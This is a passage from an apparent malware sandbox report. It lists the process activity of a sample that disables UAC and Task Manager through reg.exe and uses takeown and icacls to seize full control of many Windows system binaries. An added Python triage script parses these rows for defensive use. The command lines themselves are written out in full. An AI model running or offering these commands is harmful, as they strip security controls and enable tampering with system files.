PID 4432 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
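Two things in this report are worth pulling out with a script rather than reading row by row: the WriteProcessMemory rows above, which the sandbox lists twice per child and which here document PID 4432 spawning reg.exe, takeown.exe and icacls.exe (the same images appear as ordinary child processes under Processes below, so the rows record the spawn chain rather than a write into an unrelated process), and the command lines under Processes, where EnableLUA=0 under HKLM switches UAC off at the next logon, DisableTaskMgr=1 removes Task Manager, and each takeown /F ... followed by icacls ... /GRANT:r Admin:(F) hands a user account full control of a Windows binary that is normally owned by TrustedInstaller. The following is an added example, not sandbox output and not the sample's own code; the rows and command lines it embeds are copied from this report, and the hostname KVIWLPUJ in takeown's /S argument is the sandbox machine, not a reusable indicator. The tags (uac_disabled, taskmgr_disabled, system_binary_takeown, system_binary_acl_grant) and the helper names are this example's own.

```python
"""Triage helpers for the process data in this report (added example; not
sandbox output and not the sample's own code). The signature rows and
command lines below are copied from the report. KVIWLPUJ in takeown's /S
argument is the sandbox's hostname, so it is not a reusable indicator."""
import re
from collections import Counter

PARENT = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe")

# Subset of the "Suspicious use of WriteProcessMemory" rows. The sandbox lists
# each parent/child event twice; spawn_chain() collapses the duplicates.
WPM_ROWS = [
    f"PID 4432 wrote to memory of {cpid} N/A {PARENT} C:\\Windows\\System32\\{child}"
    for cpid, child in [(1300, "reg.exe"), (1300, "reg.exe"), (920, "reg.exe"),
                        (920, "reg.exe"), (2104, "takeown.exe"), (2104, "takeown.exe"),
                        (4192, "icacls.exe"), (4192, "icacls.exe"), (1184, "takeown.exe"),
                        (1184, "takeown.exe"), (2396, "icacls.exe"), (2396, "icacls.exe")]
]

# Command lines copied from the Processes section of the report.
CMDLINES = [
    r'"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\bfsvc.exe"',
    r'"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)',
    r'"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"',
    r'"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)',
    r'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

WPM_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
REG_ADD_RE = re.compile(r"^add\s+(?P<key>\S+)\s+/v\s+(?P<name>\S+)\s+/t\s+\S+\s+/d\s+(?P<data>\S+)", re.I)
PATH_ARG = r'(?:"(?P<q>[^"]+)"|(?P<u>\S+))'     # quoted or bare path argument
TAKEOWN_RE = re.compile(r"/F\s+" + PATH_ARG, re.I)
ICACLS_RE = re.compile(r"^" + PATH_ARG + r"\s+(?P<args>.*)$")
SYSTEM_DIR = "c:\\windows\\"


def spawn_chain(rows):
    """Map (parent pid, child pid) -> (parent image, child image), de-duplicated."""
    chain = {}
    for row in rows:
        m = WPM_RE.match(row)
        if m:
            ppid, cpid, pimg, cimg = m.groups()
            chain[(int(ppid), int(cpid))] = (pimg, cimg)
    return chain


def children_by_image(chain):
    """Count distinct children per (parent pid, child image basename)."""
    return Counter((ppid, cimg.rsplit("\\", 1)[-1].lower())
                   for (ppid, _), (_, cimg) in chain.items())


def split_image(cmdline):
    """Split a Windows command line into (image basename, remaining arguments)."""
    if cmdline.startswith('"'):
        end = cmdline.index('"', 1)
        image, rest = cmdline[1:end], cmdline[end + 1:]
    else:
        image, _, rest = cmdline.partition(" ")
    return image.rsplit("\\", 1)[-1].lower(), rest.strip()


def triage_cmdline(cmdline):
    """Return (tag, detail) findings for one command line; [] if nothing matched."""
    image, rest = split_image(cmdline)
    findings = []
    if image == "reg.exe":
        m = REG_ADD_RE.match(rest)
        if m and m.group("key").upper().endswith("\\POLICIES\\SYSTEM"):
            name, data = m.group("name").lower(), m.group("data")
            if name == "enablelua" and data == "0":
                findings.append(("uac_disabled", m.group("key")))     # effective at next logon
            elif name == "disabletaskmgr" and data == "1":
                findings.append(("taskmgr_disabled", m.group("key")))
    elif image == "takeown.exe":
        m = TAKEOWN_RE.search(rest)
        path = m and (m.group("q") or m.group("u"))
        if path and path.lower().startswith(SYSTEM_DIR):
            findings.append(("system_binary_takeown", path))
    elif image == "icacls.exe":
        m = ICACLS_RE.match(rest)
        path = m and (m.group("q") or m.group("u"))
        if path and path.lower().startswith(SYSTEM_DIR) and "/grant" in m.group("args").lower():
            findings.append(("system_binary_acl_grant", path))
    return findings


def acl_tampered_files(cmdlines):
    """Files that had both their owner taken and an explicit grant applied: the
    pair that lets an ordinary account overwrite a TrustedInstaller-owned binary."""
    owned, granted = set(), set()
    for cmdline in cmdlines:
        for tag, path in triage_cmdline(cmdline):
            if tag == "system_binary_takeown":
                owned.add(path.lower())
            elif tag == "system_binary_acl_grant":
                granted.add(path.lower())
    return owned & granted


if __name__ == "__main__":
    print(children_by_image(spawn_chain(WPM_ROWS)))
    for c in CMDLINES:
        print(split_image(c)[0], "->", triage_cmdline(c) or "-")
    print(sorted(acl_tampered_files(CMDLINES)))
```

Feeding the full Processes list to acl_tampered_files() gives the set of Windows binaries whose owner and ACL were both rewritten, which is the list to hand to remediation (the many repeated wowreg32.exe pairs collapse to a single entry). The HKLM EnableLUA write and the takeown calls only succeed from an elevated token, so a hit on either from a process running as a standard user is itself worth a look even when the report shows no return codes.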

Processes

C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

